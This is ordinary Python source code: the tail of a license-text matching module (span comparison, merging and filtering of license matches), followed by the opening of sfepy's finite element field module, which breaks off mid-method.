ireg=(self.istart, self.iend),
lines=self.lines,
matcher=self.matcher,
)
return ('LicenseMatch<%(rule_id)r, %(rule_licenses)r, '
'score=%(score)r, qlen=%(qlen)r, ilen=%(ilen)r, hilen=%(hilen)r, rlen=%(rlen)r, '
'qreg=%(qreg)r, ireg=%(ireg)r, '
'%(spans)s'
'lines=%(lines)r, %(matcher)r>') % rep
def __eq__(self, other):
"""
Strict equality.
"""
return (isinstance(other, LicenseMatch)
and self.same_licensing(other)
and self.qspan == other.qspan
and self.ispan == other.ispan
)
def same(self, other):
"""
Return True if other has the same licensing, score and spans.
"""
return (isinstance(other, LicenseMatch)
and self.same_licensing(other)
and self.qspan == other.qspan
and self.ispan == other.ispan)
def same_licensing(self, other):
"""
Return True if other has the same detected license keys.
"""
return self.rule.same_licensing(other.rule)
def __lt__(self, other):
return self.qstart < other.qstart
@property
def qstart(self):
return self.qspan.start
@property
def qend(self):
return self.qspan.end
def qlen(self):
"""
Return the length of the match as the number of matched query tokens.
"""
return len(self.qspan)
def qmagnitude(self):
return self.qspan.magnitude()
@property
def istart(self):
return self.ispan.start
@property
def iend(self):
return self.ispan.end
def ilen(self):
"""
Return the length of the match as the number of matched index tokens.
"""
return len(self.ispan)
def imagnitude(self):
return self.ispan.magnitude()
@property
def histart(self):
return self.hispan.start
@property
def hiend(self):
return self.hispan.end
def hilen(self):
"""
Return the length of the match as the number of matched query tokens.
"""
return len(self.hispan)
@property
def lines(self):
return self.line_by_pos.get(self.qstart, 0), self.line_by_pos.get(self.qend, 0)
def __contains__(self, other):
"""
Return True if every other qspan and ispan are contained in any self qspan.
"""
return self.contains_qspan(other) and self.contains_ispan(other)
def contains_qspan(self, other):
return other.qspan.issubset(self.qspan)
def contains_ispan(self, other):
return other.ispan.issubset(self.ispan)
def qdistance_to(self, other):
"""
Return the absolute qspan distance to other match.
Touching and overlapping matches have a zero distance.
"""
return self.qspan.distance_to(other.qspan)
def idistance_to(self, other):
"""
Return the absolute ispan distance from self to other match.
Touching and overlapping matches have a zero distance.
"""
return self.ispan.distance_to(other.ispan)
def qoverlap(self, other):
return self.qspan.overlap(other.qspan)
def ioverlap(self, other):
return self.ispan.overlap(other.ispan)
def overlap(self, other):
"""
Return True if this match spans both overlap with other match spans.
"""
return self.qoverlap(other) and self.ioverlap(other)
def qtouch(self, other):
return self.qspan.touch(other.qspan)
def itouch(self, other):
return self.ispan.touch(other.ispan)
def touch(self, other):
"""
Return True if this match spans both touch other match spans.
"""
return self.qtouch(other) and self.itouch(other)
def qsurround(self, other):
return self.qspan.surround(other.qspan)
def isurround(self, other):
return self.ispan.surround(other.ispan)
def is_qafter(self, other):
return self.qspan.is_after(other.qspan)
def is_iafter(self, other):
return self.ispan.is_after(other.ispan)
def is_after(self, other):
"""
Return True if this match spans are strictly after other match spans.
"""
return self.is_qafter(other) and self.is_iafter(other)
def subtract(self, other):
"""
Subtract an other match from this match by removing overlapping span
items present in both matches from this match.
"""
self.qspan.difference_update(other.qspan)
self.ispan.difference_update(other.ispan)
return self
@staticmethod
def merge(matches, max_dist=MAX_DIST):
"""
Merge overlapping, touching or close-by matches in the given iterable of
matches. Return a new list of merged matches if they can be merged.
Matches that cannot be merged are returned as-is.
Only matches for the same rules can be merged.
The overlap and touch is considered using both the qspan and ispan.
The maximal merge is always returned and eventually a single match per
rule is returned if all matches for that rule can be merged.
For being merged two matches must also be in increasing query and index positions.
"""
# FIXME: longer and denser matches starting at the same qspan should
# be sorted first
# only merge matches with the same licensing_identifier
# iterate on matches grouped by licensing_identifier, one licensing_identifier at a time.
# we divide by ROUNDING with an intergerb division to round values in coarse bands
sorter = lambda m: (m.rule.licensing_identifier, m.qspan.start , -m.qlen(), -m.ilen())
matches = sorted(matches, key=sorter)
merged = []
for _rid, rule_matches in groupby(matches, key=lambda m: m.rule.licensing_identifier):
rule_matches = list(rule_matches)
i = 0
if TRACE_MERGE:
logger_debug('merge_match: processing rule:', rule_matches[0].rule.identifier)
# compare two matches in the sorted sequence: current_match and the next one
while i < len(rule_matches) - 1:
current_match = rule_matches[i]
j = i + 1
if TRACE_MERGE: logger_debug('merge_match: current_match:', current_match)
while j < len(rule_matches):
next_match = rule_matches[j]
if TRACE_MERGE: logger_debug(' merge_match: next_match:', next_match)
if next_match.qdistance_to(current_match) >= max_dist or next_match.idistance_to(current_match) >= max_dist:
break
# remove surrounded matches
if current_match.qsurround(next_match):
# current_match.update(next_match)
if TRACE_MERGE: logger_debug(' ==> NEW MERGED 1:', current_match)
if TRACE_MERGE_TEXTS: print('MERGE ==> surround:\n',
current_match, '\n', get_match_itext(current_match),
'\nnext:\n', get_match_itext(next_match))
del rule_matches[j]
# next_match is strictly in increasing sequence and within distance
# and same rule
elif (next_match.is_after(current_match)
and current_match.rule == next_match.rule
and next_match.qdistance_to(current_match) < max_dist
and next_match.idistance_to(current_match) < max_dist):
current_match.update(next_match)
if TRACE_MERGE: logger_debug(' ==> NEW MERGED 2:', current_match)
if TRACE_MERGE_TEXTS: print('MERGE ==> increasing within dist\n',
current_match, '\n', get_match_itext(current_match),
'\nnext:\n', get_match_itext(next_match))
del rule_matches[j]
else:
j += 1
i += 1
merged.extend(rule_matches)
return merged
def combine(self, other):
"""
Return a new match combining self and an other match.
"""
same_rule = self.rule == other.rule
# FIXME: we may be combining apples and oranges by considering same licensing too!
same_licensing = self.same_licensing(other)
if not (same_rule or same_licensing):
raise TypeError('Cannot combine matches with different rules or licensing: from: %(self)r, to: %(other)r' % locals())
if other.matcher not in self.matcher:
newmatcher = ' '.join([self.matcher, other.matcher])
else:
newmatcher = self.matcher
line_by_pos = dict(self.line_by_pos)
line_by_pos.update(other.line_by_pos)
combined = LicenseMatch(rule=self.rule,
qspan=Span(self.qspan | other.qspan),
ispan=Span(self.ispan | other.ispan),
hispan=Span(self.hispan | other.hispan),
line_by_pos=line_by_pos,
query_run_start=min(self.query_run_start, other.query_run_start),
matcher=newmatcher)
return combined
def update(self, other):
"""
Update self with other match and return self.
"""
combined = self.combine(other)
self.qspan = combined.qspan
self.ispan = combined.ispan
self.hispan = combined.hispan
self.line_by_pos = combined.line_by_pos
self.matcher = combined.matcher
self.query_run_start = min(self.query_run_start, other.query_run_start)
return self
def rebase(self, new_query_start, new_query_end, line_by_pos, matcher):
"""
Return a copy of this match with a new qspan and new line_by_pos and
updating the matcher of match as needed.
"""
offset = new_query_start - self.query_run_start
return LicenseMatch(
rule=self.rule,
qspan=self.qspan.rebase(offset),
ispan=Span(self.ispan),
hispan=Span(self.hispan),
line_by_pos=line_by_pos,
query_run_start=new_query_start,
matcher=' '.join([self.matcher.replace(cache.MATCH_TYPE, '').strip(), matcher]),
)
def score(self):
"""
Return the score for this match as a float between 0 and 100.
This is a ratio of matched tokens to the rule length.
"""
# TODO: compute a better score based tf/idf, BM25, applying ratio to low tokens, etc
if not self.rule.length:
return 0
score = self.ilen() / self.rule.length
return round(score * 100, 2)
def small(self):
"""
Return True if this match is "small" based on its rule thresholds.
"""
thresholds = self.rule.thresholds()
min_ihigh = thresholds.min_high
min_ilen = thresholds.min_len
hilen = self.hilen()
ilen = self.ilen()
if TRACE_REFINE_SMALL:
logger_debug('LicenseMatch.small(): hilen=%(hilen)r < min_ihigh=%(min_ihigh)r or ilen=%(ilen)r < min_ilen=%(min_ilen)r : thresholds=%(thresholds)r' % locals(),)
if thresholds.small and self.score() < 50 and (hilen < min_ihigh or ilen < min_ilen):
return True
if hilen < min_ihigh or ilen < min_ilen:
return True
def false_positive(self, idx):
"""
Return a false positive rule id if the LicenseMatch match is a false
positive or None otherwise (nb: not False).
Lookup the matched tokens sequence against the idx index.
"""
ilen = self.ilen()
if ilen > idx.largest_false_positive_length:
return
rule_tokens = idx.tids_by_rid[self.rule.rid]
ispan = self.ispan
matched_itokens = array('h', (tid for ipos, tid in enumerate(rule_tokens) if ipos in ispan))
# note: hash computation is inlined here but MUST be the same code as in match_hash
matched_hash = md5(matched_itokens.tostring()).digest()
return idx.false_positive_rid_by_hash.get(matched_hash)
def filter_matches(matches):
"""
Return a filtered list of LicenseMatch given a `matches` list of
LicenseMatch by removing duplicated or superfluous matches based on matched
positions relation such as sequence, containment, touch, overlap, same
licensing.
Matches that are entirely contained in another bigger match are removed.
When more than one matched position matches the same license(s), only one
match of this set is kept.
"""
matches = sorted(matches, key=lambda m: (m.qstart // ROUNDING, -m.qlen(), -m.ilen()))
if TRACE_FILTER: print('filter_matches: number of matches to process:', len(matches))
discarded = []
# compare two matches in the sorted sequence: current_match and the next one
i = 0
while i < len(matches) - 1:
current_match = matches[i]
j = i + 1
while j < len(matches):
next_match = matches[j]
if TRACE_FILTER: print('filter_match: current_match:', current_match)
if TRACE_FILTER: print(' filter_match: next_match:', next_match)
# Skip qcontained, irrespective of licensing
# FIXME: by construction this CANNOT happen
if current_match.contains_qspan(next_match):
if TRACE_FILTER: print(' filter_matches: next_match in current_match')
del matches[j]
continue
if current_match.qsurround(next_match):
# Skip if next match is surrounded and has same of licensing
if current_match.same_licensing(next_match):
if TRACE_FILTER: print(' filter_matches: next_match in current_match region and same licensing')
del matches[j]
continue
if current_match.qlen() > (next_match.qlen() * 2):
# Skip if next match is surrounded and is much smaller than current
if TRACE_FILTER: print(' filter_matches: remove surrounding with much bigger match')
del matches[j]
continue
# the next_match has some region overlap
if current_match.qstart < next_match.qstart and current_match.qend < next_match.qend:
# compute region overlap
overlapping = [p for p in next_match.qspan if p < current_match.qend]
overlap = len(overlapping)
# over 50 % of overlap: discard
if overlap > (len(next_match.qspan) / 2):
if TRACE_FILTER: print(' filter_matches: remove partially overlapping with much bigger match')
matches[i] = current_match
discarded.append(matches[j])
del matches[j]
continue
j += 1
i += 1
# FIXME: returned discarded too
return matches, discarded
def filter_low_score(matches, min_score=100):
"""
Return a list of matches scoring above `min_score` and a list of matches scoring below.
"""
if not min_score:
return matches, []
kept = []
discarded = []
for match in matches:
if match.score() < min_score:
discarded.append(match)
else:
kept.append(match)
return kept, discarded
def filter_short_matches(matches):
"""
Return a list of matches that are not small and a list of small matches.
"""
kept = []
discarded = []
for match in matches:
if match.small():
if TRACE_REFINE_SMALL: logger_debug('DISCARDING SHORT:', match)
discarded.append(match)
else:
if TRACE_REFINE_SMALL: logger_debug(' ===> NOT DISCARDING SHORT:', match)
kept.append(match)
return kept, discarded
def filter_spurious_matches(matches):
"""
Return a list of matches that are not spurious and a list of spurrious
matches.
"""
kept = []
discarded = []
for match in matches:
qdens = match.qspan.density()
idens = match.ispan.density()
ilen = match.ilen()
hilen = match.hilen()
if ilen < 20 and hilen < 5 and (qdens < 0.3 or idens < 0.3):
if TRACE_REFINE: logger_debug('DISCARDING Spurrious:', match)
discarded.append(match)
else:
kept.append(match)
return kept, discarded
def filter_false_positive_matches(idx, matches):
"""
Return a list of matches that are not false positives and a list of false
positive matches given an index `idx`.
"""
kept = []
discarded = []
for match in matches:
fp = match.false_positive(idx)
if fp is None:
if TRACE_REFINE: logger_debug('NOT DISCARDING FALSE POSITIVE:', match)
kept.append(match)
else:
if TRACE_REFINE: logger_debug('DISCARDING FALSE POSITIVE:', match, 'fp rule:', idx.rules_by_rid[fp].identifier)
discarded.append(match)
return kept, discarded
def refine_matches(matches, idx, min_score=0, max_dist=MAX_DIST):
"""
Return two sequences of matches: one contains refined good matches, and the
other contains matches that were filtered out.
"""
if TRACE: logger_debug()
if TRACE: logger_debug(' #####refine_matches: START matches#', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
all_discarded = []
matches, discarded = filter_short_matches(matches)
all_discarded.extend(discarded)
if TRACE: logger_debug(' #####refine_matches: NOT SHORT #', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' #####refine_matches: SHORT discarded#', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
matches, discarded = filter_false_positive_matches(idx, matches)
all_discarded.extend(discarded)
if TRACE: logger_debug(' #####refine_matches: NOT FALSE POS #', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' #####refine_matches: FALSE POS discarded#', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
matches, discarded = filter_spurious_matches(matches)
all_discarded.extend(discarded)
if TRACE: logger_debug(' #####refine_matches: NOT SPURIOUS#', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' #####refine_matches: SPURIOUS discarded#', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
matches = LicenseMatch.merge(matches, max_dist=max_dist)
logger_debug(' ##### refine_matches: MERGED_matches#:', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
matches, discarded = filter_matches(matches)
all_discarded.extend(discarded)
logger_debug(' ##### refine_matches: NOT FILTERED matches#:', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' #####refine_matches: FILTERED discarded#', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
if min_score:
matches, discarded = filter_low_score(matches, min_score=min_score)
all_discarded.extend(discarded)
if TRACE: logger_debug(' #####refine_matches: NOT LOW SCORE #', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' ###refine_matches: LOW SCORE discarded #:', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
matches = LicenseMatch.merge(matches, max_dist=max_dist)
logger_debug(' ##### refine_matches: FINAL MERGED_matches#:', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
return matches, all_discarded
def get_texts(match, location=None, query_string=None, idx=None, width=120):
"""
Given a match and a query location of query string return a tuple of wrapped
texts at `width` for:
- the matched query text as a string.
- the matched rule text as a string.
Used primarily to recover the matched texts for testing or reporting.
Unmatched positions are represented as <no-match>, rule gaps as <gap>.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
If `width` is a number superior to zero, the texts are wrapped to width.
"""
assert idx
return (get_matched_qtext(match, location, query_string, idx, width),
get_match_itext(match, width))
def get_matched_qtext(match, location=None, query_string=None, idx=None, width=120):
"""
Return the matched query text as a wrapped string of `width` given a match,
a query location or string and an index.
Used primarily to recover the matched texts for testing or reporting.
Unmatched positions are represented as <no-match>.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
If `width` is a number superior to zero, the texts are wrapped to width.
"""
assert idx
tokens = matched_query_tokens_str(match, location, query_string, idx)
return format_text(tokens, width)
def get_match_itext(match, width=120):
"""
Return the matched rule text as a wrapped string of `width` given a match.
Used primarily to recover the matched texts for testing or reporting.
Unmatched positions inside a matched region are represented as <no-match>
and rule gaps as <gap>.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
If `width` is a number superior to zero, the texts are wrapped to width.
"""
return format_text(matched_rule_tokens_str(match), width)
def format_text(tokens, width=120, no_match='<no-match>'):
"""
Return a formatted text wrapped at `width` given an iterable of tokens.
None tokens for unmatched positions are replaced with `no_match`.
"""
nomatch = lambda s: s or no_match
tokens = map(nomatch, tokens)
# if width =0
noop = lambda x: [x]
wrapper = partial(textwrap.wrap, width=width, break_on_hyphens=False)
wrap = width and wrapper or noop
return u'\n'.join(wrap(u' '.join(tokens)))
def matched_query_tokens_str(match, location=None, query_string=None, idx=None):
"""
Return an iterable of matched query token strings given a query file at
`location` or a `query_string`, a match and an index. Yield None for
unmatched positions.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
Used primarily to recover the matched texts for testing or reporting.
"""
assert idx
dictionary_get = idx.dictionary.get
tokens = (query.query_tokenizer(line, lower=False)
for line in query.query_lines(location, query_string))
tokens = chain.from_iterable(tokens)
match_qspan = match.qspan
match_qspan_start = match_qspan.start
match_qspan_end = match_qspan.end
known_pos = -1
started = False
finished = False
for token in tokens:
token_id = dictionary_get(token.lower())
if token_id is None:
if not started:
continue
if finished:
break
else:
known_pos += 1
if match_qspan_start <= known_pos <= match_qspan_end:
started = True
if known_pos == match_qspan_end:
finished = True
if known_pos in match_qspan and token_id is not None:
yield token
else:
yield None
def matched_rule_tokens_str(match, gap='<gap>'):
"""
Return an iterable of matched rule token strings given a match. Yield None
for unmatched positions. Yield the `gap` string to represent a gap.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
Used primarily to recover the matched texts for testing or reporting.
"""
span = match.ispan
gaps = match.rule.gaps
for pos, token in enumerate(match.rule.tokens(lower=False)):
if span.start <= pos <= span.end:
tok = None
if pos in span:
tok = token
yield tok
if gaps and pos in gaps:
yield gap
|
"""
Notes
-----
Important attributes of continuous (order > 0) :class:`Field` and
:class:`SurfaceField` instances:
- `vertex_remap` : `econn[:, :n_vertex] = vertex_remap[conn]`
- `vertex_remap_i` : `conn = vertex_remap_i[econn[:, :n_vertex]]`
where `conn` is the mesh vertex connectivity, `econn` is the
region-local field connectivity.
"""
from __future__ import absolute_import
import numpy as nm
from sfepy.base.base import output, get_default, assert_
from sfepy.base.base import Struct
from sfepy.base.timing import Timer
from sfepy.discrete.common.fields import parse_shape, Field
from sfepy.discrete.fem.mesh import Mesh
from sfepy.discrete.fem.meshio import convert_complex_output
from sfepy.discrete.fem.utils import (extend_cell_data, prepare_remap,
invert_remap, get_min_value)
from sfepy.discrete.fem.mappings import VolumeMapping, SurfaceMapping
from sfepy.discrete.fem.poly_spaces import PolySpace
from sfepy.discrete.fem.fe_surface import FESurface
from sfepy.discrete.integrals import Integral
from sfepy.discrete.fem.linearizer import (get_eval_dofs, get_eval_coors,
create_output)
import six
def set_mesh_coors(domain, fields, coors, update_fields=False, actual=False,
clear_all=True, extra_dofs=False):
if actual:
if not hasattr(domain.mesh, 'coors_act'):
domain.mesh.coors_act = nm.zeros_like(domain.mesh.coors)
domain.mesh.coors_act[:] = coors[:domain.mesh.n_nod]
else:
domain.cmesh.coors[:] = coors[:domain.mesh.n_nod]
if update_fields:
for field in six.itervalues(fields):
field.set_coors(coors, extra_dofs=extra_dofs)
field.clear_mappings(clear_all=clear_all)
def eval_nodal_coors(coors, mesh_coors, region, poly_space, geom_poly_space,
econn, only_extra=True):
"""
Compute coordinates of nodes corresponding to `poly_space`, given
mesh coordinates and `geom_poly_space`.
"""
if only_extra:
iex = (poly_space.nts[:,0] > 0).nonzero()[0]
if iex.shape[0] == 0: return
qp_coors = poly_space.node_coors[iex, :]
econn = econn[:, iex].copy()
else:
qp_coors = poly_space.node_coors
##
# Evaluate geometry interpolation base functions in (extra) nodes.
bf = geom_poly_space.eval_base(qp_coors)
bf = bf[:,0,:].copy()
##
# Evaluate extra coordinates with 'bf'.
cmesh = region.domain.cmesh
conn = cmesh.get_incident(0, region.cells, region.tdim)
conn.shape = (econn.shape[0], -1)
ecoors = nm.dot(bf, mesh_coors[conn])
coors[econn] = nm.swapaxes(ecoors, 0, 1)
def _interp_to_faces(vertex_vals, bfs, faces):
dim = vertex_vals.shape[1]
n_face = faces.shape[0]
n_qp = bfs.shape[0]
faces_vals = nm.zeros((n_face, n_qp, dim), nm.float64)
for ii, face in enumerate(faces):
vals = vertex_vals[face,:dim]
faces_vals[ii,:,:] = nm.dot(bfs[:,0,:], vals)
return(faces_vals)
def get_eval_expression(expression,
fields, materials, variables,
functions=None, mode='eval', term_mode=None,
extra_args=None, verbose=True, kwargs=None):
"""
Get the function for evaluating an expression given a list of elements,
and reference element coordinates.
"""
from sfepy.discrete.evaluate import eval_in_els_and_qp
def _eval(iels, coors):
val = eval_in_els_and_qp(expression, iels, coors,
fields, materials, variables,
functions=functions, mode=mode,
term_mode=term_mode,
extra_args=extra_args, verbose=verbose,
kwargs=kwargs)
return val[..., 0]
return _eval
def create_expression_output(expression, name, primary_field_name,
fields, materials, variables,
functions=None, mode='eval', term_mode=None,
extra_args=None, verbose=True, kwargs=None,
min_level=0, max_level=1, eps=1e-4):
"""
Create output mesh and data for the expression using the adaptive
linearizer.
Parameters
----------
expression : str
The expression to evaluate.
name : str
The name of the data.
primary_field_name : str
The name of field that defines the element groups and polynomial
spaces.
fields : dict
The dictionary of fields used in `variables`.
materials : Materials instance
The materials used in the expression.
variables : Variables instance
The variables used in the expression.
functions : Functions instance, optional
The user functions for materials etc.
mode : one of 'eval', 'el_avg', 'qp'
The evaluation mode - 'qp' requests the values in quadrature points,
'el_avg' element averages and 'eval' means integration over
each term region.
term_mode : str
The term call mode - some terms support different call modes
and depending on the call mode different values are
returned.
extra_args : dict, optional
Extra arguments to be passed to terms in the expression.
verbose : bool
If False, reduce verbosity.
kwargs : dict, optional
The variables (dictionary of (variable name) : (Variable
instance)) to be used in the expression.
min_level : int
The minimum required level of mesh refinement.
max_level : int
The maximum level of mesh refinement.
eps : float
The relative tolerance parameter of mesh adaptivity.
Returns
-------
out : dict
The output dictionary.
"""
field = fields[primary_field_name]
vertex_coors = field.coors[:field.n_vertex_dof, :]
ps = field.poly_space
gps = field.gel.poly_space
vertex_conn = field.econn[:, :field.gel.n_vertex]
eval_dofs = get_eval_expression(expression,
fields, materials, variables,
functions=functions,
mode=mode, extra_args=extra_args,
verbose=verbose, kwargs=kwargs)
eval_coors = get_eval_coors(vertex_coors, vertex_conn, gps)
(level, coors, conn,
vdofs, mat_ids) = create_output(eval_dofs, eval_coors,
vertex_conn.shape[0], ps,
min_level=min_level,
max_level=max_level, eps=eps)
mesh = Mesh.from_data('linearized_mesh', coors, None, [conn], [mat_ids],
field.domain.mesh.descs)
out = {}
out[name] = Struct(name='output_data', mode='vertex',
data=vdofs, var_name=name, dofs=None,
mesh=mesh, level=level)
out = convert_complex_output(out)
return out
class FEField(Field):
"""
Base class for finite element fields.
Notes
-----
- interps and hence node_descs are per region (must have single
geometry!)
Field shape information:
- ``shape`` - the shape of the base functions in a point
- ``n_components`` - the number of DOFs per FE node
- ``val_shape`` - the shape of field value (the product of DOFs and
base functions) in a point
"""
def __init__(self, name, dtype, shape, region, approx_order=1):
"""
Create a finite element field.
Parameters
----------
name : str
The field name.
dtype : numpy.dtype
The field data type: float64 or complex128.
shape : int/tuple/str
The field shape: 1 or (1,) or 'scalar', space dimension (2, or (2,)
or 3 or (3,)) or 'vector', or a tuple. The field shape determines
the shape of the FE base functions and is related to the number of
components of variables and to the DOF per node count, depending
on the field kind.
region : Region
The region where the field is defined.
approx_order : int or tuple
The FE approximation order. The tuple form is (order, has_bubble),
e.g. (1, True) means order 1 with a bubble function.
Notes
-----
Assumes one cell type for the whole region!
"""
shape = parse_shape(shape, region.domain.shape.dim)
if not self._check_region(region):
raise ValueError('unsuitable region for field %s! (%s)' %
(name, region.name))
Struct.__init__(self, name=name, dtype=dtype, shape=shape,
region=region)
self.domain = self.region.domain
self._set_approx_order(approx_order)
self._setup_geometry()
self._setup_kind()
self._setup_shape()
self.surface_data = {}
self.point_data = {}
self.ori = None
self._create_interpolant()
self._setup_global_base()
self.setup_coors()
self.clear_mappings(clear_all=True)
self.clear_qp_base()
self.basis_transform = None
self.econn0 = None
self.unused_dofs = None
self.stored_subs = None
def _set_approx_order(self, approx_order):
"""
Set a uniform approximation order.
"""
if isinstance(approx_order, tuple):
self.approx_order = approx_order[0]
self.force_bubble = approx_order[1]
else:
self.approx_order = approx_order
self.force_bubble = False
def get_true_order(self):
"""
Get the true approximation order depending on the reference
element geometry.
For example, for P1 (linear) approximation the true order is 1,
while for Q1 (bilinear) approximation in 2D the true order is 2.
"""
gel = self.gel
if (gel.dim + 1) == gel.n_vertex:
order = self.approx_order
else:
order = gel.dim * self.approx_order
if self.force_bubble:
bubble_order = gel.dim + 1
order = max(order, bubble_order)
return order
def is_higher_order(self):
"""
Return True, if the field's approximation order is greater than one.
"""
return self.force_bubble or (self.approx_order > 1)
def _setup_global_base(self):
"""
Setup global DOF/base functions, their indices and connectivity of the
field. Called methods implemented in subclasses.
"""
self._setup_facet_orientations()
self._init_econn()
self.n_vertex_dof, self.vertex_remap = self._setup_vertex_dofs()
self.vertex_remap_i = invert_remap(self.vertex_remap)
aux = self._setup_edge_dofs()
self.n_edge_dof, self.edge_dofs, self.edge_remap = aux
aux = self._setup_face_dofs()
self.n_face_dof, self.face_dofs, self.face_remap = aux
aux = self._setup_bubble_dofs()
self.n_bubble_dof, self.bubble_dofs, self.bubble_remap = aux
self.n_nod = self.n_vertex_dof + self.n_edge_dof \
+ self.n_face_dof + self.n_bubble_dof
self._setup_esurface()
def _setup_esurface(self):
"""
Setup extended surface entities (edges in 2D, faces in 3D),
i.e. indices of surface entities into the extended connectivity.
"""
node_desc = self.node_desc
gel = self.gel
self.efaces = gel.get_surface_entities().copy()
nd = node_desc.edge
if nd is not None:
efs = []
for eof in gel.get_edges_per_face():
efs.append(nm.concatenate([nd[ie] for ie in eof]))
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.efaces = nm.hstack((self.efaces, efs))
efs = node_desc.face
if efs is not None:
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.efaces = nm.hstack((self.efaces, efs))
if gel.dim == 3:
self.eedges = gel.edges.copy()
efs = node_desc.edge
if efs is not None:
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.eedges = nm.hstack((self.eedges, efs))
def set_coors(self, coors, extra_dofs=False):
"""
Set coordinates of field nodes.
"""
# Mesh vertex nodes.
if self.n_vertex_dof:
indx = self.vertex_remap_i
self.coors[:self.n_vertex_dof] = nm.take(coors,
indx.astype(nm.int32),
axis=0)
n_ex_dof = self.n_bubble_dof + self.n_edge_dof + self.n_face_dof
# extra nodes
if n_ex_dof:
if extra_dofs:
if self.n_nod != coors.shape[0]:
raise NotImplementedError
self.coors[:] = coors
else:
gps = self.gel.poly_space
ps = self.poly_space
eval_nodal_coors(self.coors, coors, self.region,
ps, gps, self.econn)
def setup_coors(self):
"""
Setup coordinates of field nodes.
"""
mesh = self.domain.mesh
self.coors = nm.empty((self.n_nod, mesh.dim), nm.float64)
self.set_coors(mesh.coors)
def get_vertices(self):
"""
Return indices of vertices belonging to the field region.
"""
return self.vertex_remap_i
def _get_facet_dofs(self, rfacets, remap, dofs):
facets = remap[rfacets]
return dofs[facets[facets >= 0]].ravel()
def get_data_shape(self, integral, integration='volume', region_name=None):
"""
Get element data dimensions.
Parameters
----------
integral : Integral instance
The integral describing used numerical quadrature.
integration : 'volume', 'surface', 'surface_extra', 'point' or 'custom'
The term integration type.
region_name : str
The name of the region of the integral.
Returns
-------
data_shape : 4 ints
The `(n_el, n_qp, dim, n_en)` for volume shape kind,
`(n_fa, n_qp, dim, n_fn)` for surface shape kind and
`(n_nod, 0, 0, 1)` for point shape kind.
Notes
-----
- `n_el`, `n_fa` = number of elements/facets
- `n_qp` = number of quadrature points per element/facet
- `dim` = spatial dimension
- `n_en`, `n_fn` = number of element/facet nodes
- `n_nod` = number of element nodes
"""
region = self.domain.regions[region_name]
shape = region.shape
dim = region.dim
if integration in ('surface', 'surface_extra'):
sd = self.surface_data[region_name]
# This works also for surface fields.
key = sd.face_type
weights = self.get_qp(key, integral).weights
n_qp = weights.shape[0]
if integration == 'surface':
data_shape = (sd.n_fa, n_qp, dim, sd.n_fp)
else:
data_shape = (sd.n_fa, n_qp, dim, self.econn.shape[1])
elif integration in ('volume', 'custom'):
_, weights = integral.get_qp(self.gel.name)
n_qp = weights.shape[0]
data_shape = (shape.n_cell, n_qp, dim, self.econn.shape[1])
elif integration == 'point':
dofs = self.get_dofs_in_region(region, merge=True)
data_shape = (dofs.shape[0], 0, 0, 1)
else:
raise NotImplementedError('unsupported integration! (%s)'
% integration)
return data_shape
def get_dofs_in_region(self, region, merge=True):
"""
Return indices of DOFs that belong to the given region and group.
"""
node_desc = self.node_desc
dofs = []
vdofs = nm.empty((0,), dtype=nm.int32)
if node_desc.vertex is not None:
vdofs = self.vertex_remap[region.vertices]
vdofs = vdofs[vdofs >= 0]
dofs.append(vdofs)
edofs = nm.empty((0,), dtype=nm.int32)
if node_desc.edge is not None:
edofs = self._get_facet_dofs(region.edges,
self.edge_remap,
self.edge_dofs)
dofs.append(edofs)
fdofs = nm.empty((0,), dtype=nm.int32)
if node_desc.face is not None:
fdofs = self._get_facet_dofs(region.faces,
self.face_remap,
self.face_dofs)
dofs.append(fdofs)
bdofs = nm.empty((0,), dtype=nm.int32)
if (node_desc.bubble is not None) and region.has_cells():
els = self.bubble_remap[region.cells]
bdofs = self.bubble_dofs[els[els >= 0]].ravel()
dofs.append(bdofs)
if merge:
dofs = nm.concatenate(dofs)
return dofs
def clear_qp_base(self):
"""
Remove cached quadrature points and base functions.
"""
self.qp_coors = {}
self.bf = {}
def get_qp(self, key, integral):
"""
Get quadrature points and weights corresponding to the given key
and integral. The key is 'v' or 's#', where # is the number of
face vertices.
"""
qpkey = (integral.order, key)
if qpkey not in self.qp_coors:
if (key[0] == 's') and not self.is_surface:
dim = self.gel.dim - 1
n_fp = self.gel.surface_facet.n_vertex
geometry = '%d_%d' % (dim, n_fp)
else:
geometry = self.gel.name
vals, weights = integral.get_qp(geometry)
self.qp_coors[qpkey] = Struct(vals=vals, weights=weights)
return self.qp_coors[qpkey]
def substitute_dofs(self, subs, restore=False):
"""
Perform facet DOF substitutions according to `subs`.
Modifies `self.econn` in-place and sets `self.econn0`,
`self.unused_dofs` and `self.basis_transform`.
"""
if restore and (self.stored_subs is not None):
self.econn0 = self.econn
self.econn, self.unused_dofs, basis_transform = self.stored_subs
else:
if subs is None:
self.econn0 = self.econn
return
else:
self.econn0 = self.econn.copy()
self._substitute_dofs(subs)
self.unused_dofs = nm.setdiff1d(self.econn0, self.econn)
basis_transform = self._eval_basis_transform(subs)
self.set_basis_transform(basis_transform)
def restore_dofs(self, store=False):
"""
Undoes the effect of :func:`FEField.substitute_dofs()`.
"""
if self.econn0 is None:
raise ValueError('no original DOFs to restore!')
if store:
self.stored_subs = (self.econn,
